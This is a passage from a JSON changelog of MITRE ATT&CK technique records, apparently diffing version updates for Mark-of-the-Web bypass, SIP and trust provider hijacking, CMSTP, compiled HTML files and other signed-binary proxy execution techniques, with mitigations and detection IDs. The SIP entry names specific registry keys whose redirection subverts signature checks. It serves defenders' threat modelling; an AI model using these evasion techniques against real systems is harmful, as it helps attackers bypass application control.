                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.931000+00:00\", \"old_value\": \"2025-10-24 17:49:21.832000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.3\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"Microsoft Sigcheck May 2017\", \"description\": \"Russinovich, M. et al.. (2017, May 22). Sigcheck. Retrieved April 3, 2018.\", \"url\": \"https://docs.microsoft.com/sysinternals/downloads/sigcheck\"}, \"root['external_references'][6]\": {\"source_name\": \"Tripwire AppUNBlocker\", \"description\": \"Smith, T. (2016, October 27). AppUNBlocker: Bypassing AppLocker. Retrieved December 19, 2017.\", \"url\": \"https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1028: Operating System Configuration",
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0056: Detection Strategy for Subvert Trust Controls via Install Root Certificate."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-02-22 14:20:31.650000+00:00",
                    "modified": "2026-04-16 20:07:53.040000+00:00",
                    "name": "Mark-of-the-Web Bypass",
                    "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/005",
                            "external_id": "T1553.005"
                        },
                        {
                            "source_name": "Beek Use of VHD Dec 2020",
                            "description": "Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20201203131725/https://christiaanbeek.medium.com/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316"
                        },
                        {
                            "source_name": "Outflank MotW 2020",
                            "description": "Hegt, S. (2020, March 30). Mark-of-the-Web from a red team\u2019s perspective. Retrieved February 22, 2021.",
                            "url": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/"
                        },
                        {
                            "source_name": "Intezer Russian APT Dec 2020",
                            "description": "Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.",
                            "url": "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
                        },
                        {
                            "source_name": "Microsoft Zone.Identifier 2020",
                            "description": "Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.",
                            "url": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Christiaan Beek, @ChristiaanBeek"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.040000+00:00\", \"old_value\": \"2025-10-24 17:49:01.286000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}, \"iterable_item_removed\": {\"root['external_references'][5]\": {\"source_name\": \"Disable automount for ISO\", \"description\": \"wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.\", \"url\": \"https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0257: Detect Mark-of-the-Web (MOTW) Bypass via Container and Disk Image Files"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-05 19:34:04.910000+00:00",
                    "modified": "2026-04-16 20:07:53.087000+00:00",
                    "name": "SIP and Trust Provider Hijacking",
                    "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID}</code> that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID}</code> that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1553/003",
                            "external_id": "T1553.003"
                        },
                        {
                            "source_name": "GitHub SIP POC Sept 2017",
                            "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.",
                            "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage"
                        },
                        {
                            "source_name": "SpectorOps Subverting Trust Sept 2017",
                            "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.",
                            "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
                        },
                        {
                            "source_name": "Microsoft Catalog Files and Signatures April 2017",
                            "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.",
                            "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files"
                        },
                        {
                            "source_name": "Microsoft Authenticode",
                            "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.",
                            "url": "https://msdn.microsoft.com/library/ms537359.aspx"
                        },
                        {
                            "source_name": "Microsoft WinVerifyTrust",
                            "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx"
                        },
                        {
                            "source_name": "EduardosBlog SIPs July 2008",
                            "description": "Navarro, E. (2008, July 11). SIP\u2019s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.",
                            "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Matt Graeber, @mattifestation, SpecterOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.087000+00:00\", \"old_value\": \"2025-10-24 17:48:48.200000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.1\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Entrust Enable CAPI2 Aug 2017\", \"description\": \"Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.\", \"url\": \"http://www.entrust.net/knowledge-base/technote.cfm?tn=8165\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft Audit Registry July 2012\", \"description\": \"Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.\", \"url\": \"https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft Registry Auditing Aug 2016\", \"description\": \"Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.\", \"url\": \"https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1024: Restrict Registry Permissions",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0442: Detection Strategy for Subvert Trust Controls using SIP and Trust Provider Hijacking."
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 22:37:10.607000+00:00",
                    "name": "System Binary Proxy Execution",
                    "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218",
                            "external_id": "T1218"
                        },
                        {
                            "source_name": "GTFO split",
                            "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.",
                            "url": "https://gtfobins.github.io/gtfobins/split/"
                        },
                        {
                            "source_name": "LOLBAS Project",
                            "description": "Oddvar Moe et al. (2022, February).  Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.",
                            "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"
                        },
                        {
                            "source_name": "split man page",
                            "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) \u2014 Linux manual page. Retrieved March 25, 2022.",
                            "url": "https://man7.org/linux/man-pages/man1/split.1.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Hans Christoffer Gaardl\u00f8s",
                        "Nishan Maharjan, @loki248",
                        "Praetorian",
                        "Wes Hurd"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "4.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:37:10.607000+00:00\", \"old_value\": \"2025-10-24 17:48:43.406000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"4.0\", \"old_value\": \"3.2\"}}}",
                    "previous_version": "3.2",
                    "version_change": "3.2 \u2192 4.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1026: Privileged Account Management",
                            "M1037: Filter Network Traffic",
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program",
                            "M1050: Exploit Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0081: Detection of Proxy Execution via Trusted Signed Binaries Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 18:27:30.656000+00:00",
                    "modified": "2026-04-15 22:37:18.154000+00:00",
                    "name": "CMSTP",
                    "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/003",
                            "external_id": "T1218.003"
                        },
                        {
                            "source_name": "Twitter CMSTP Usage Jan 2018",
                            "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved September 12, 2024.",
                            "url": "https://x.com/ItsReallyNick/status/958789644165894146"
                        },
                        {
                            "source_name": "Microsoft Connection Manager Oct 2009",
                            "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.",
                            "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)"
                        },
                        {
                            "source_name": "MSitPros CMSTP Aug 2017",
                            "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.",
                            "url": "https://msitpros.com/?p=3960"
                        },
                        {
                            "source_name": "GitHub Ultimate AppLocker Bypass List",
                            "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.",
                            "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"
                        },
                        {
                            "source_name": "Endurant CMSTP July 2018",
                            "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/"
                        },
                        {
                            "source_name": "Twitter CMSTP Jan 2018",
                            "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved September 12, 2024.",
                            "url": "https://x.com/NickTyrer/status/958450014111633408"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Nik Seetharaman, Palantir",
                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:37:18.154000+00:00\", \"old_value\": \"2025-10-24 17:48:45.149000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0328: Detection of Malicious Profile Installation via CMSTP.exe"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 18:53:54.377000+00:00",
                    "modified": "2026-04-15 22:37:42.151000+00:00",
                    "name": "Compiled HTML File",
                    "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/001",
                            "external_id": "T1218.001"
                        },
                        {
                            "source_name": "Microsoft CVE-2017-8625 Aug 2017",
                            "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.",
                            "url": "https://web.archive.org/web/20250419140549/https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2017-8625"
                        },
                        {
                            "source_name": "Microsoft HTML Help May 2018",
                            "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.",
                            "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk"
                        },
                        {
                            "source_name": "Microsoft HTML Help Executable Program",
                            "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.",
                            "url": "https://msdn.microsoft.com/windows/desktop/ms524405"
                        },
                        {
                            "source_name": "Microsoft HTML Help ActiveX",
                            "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.",
                            "url": "https://msdn.microsoft.com/windows/desktop/ms644670"
                        },
                        {
                            "source_name": "MsitPros CHM Aug 2017",
                            "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM \u2013 CVE-2017-8625. Retrieved October 3, 2018.",
                            "url": "https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:37:42.151000+00:00\", \"old_value\": \"2025-10-24 17:49:11.609000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20250419140549/https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2017-8625\", \"old_value\": \"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0342: Detection of Suspicious Compiled HTML File Execution via hh.exe"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 19:59:52.630000+00:00",
                    "modified": "2026-04-15 22:37:43.971000+00:00",
                    "name": "Control Panel",
                    "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also 